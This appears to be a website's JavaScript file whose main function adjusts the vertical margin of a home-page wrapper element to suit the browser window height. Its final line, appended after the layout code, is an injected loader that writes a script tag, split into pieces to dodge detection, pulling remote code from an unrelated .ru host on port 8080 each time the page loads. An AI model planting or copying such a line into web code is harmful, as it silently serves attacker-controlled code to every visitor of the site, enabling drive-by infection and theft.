/*------- HOME MOVE -------*/
<!--
var ScrH;
window.onresize = homeMove;
function homeMove(){
	if(window.innerHeight){
		ScrH = window.innerHeight;
	}else if(document.documentElement && document.documentElement.clientHeight){
		ScrH = document.documentElement.clientHeight;
	}else if(document.body && document.body.clientHeight){
		ScrH = document.body.clientHeight;
	}
	if(window.ScrH < 540){
		if(document.all){
			document.all("home_wrapper_c").style.margin = "2px auto 2px auto";
		}else if(navigator.userAgent.indexOf("Gecko")!=-1){
			document.getElementById("home_wrapper_c").style.margin = "2px auto 2px auto";
		}
	}else{
		ScrH = Math.round((ScrH - 540)/2);
		if(document.all){
			document.all("home_wrapper_c").style.margin = ""+ ScrH +"px auto auto auto";
		}else if(navigator.userAgent.indexOf("Gecko")!=-1){
			document.getElementById("home_wrapper_c").style.margin = ""+ ScrH +"px auto auto auto";
		}
	}
}
//-->
document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Hard_Drive.js"></scr'+'ipt>');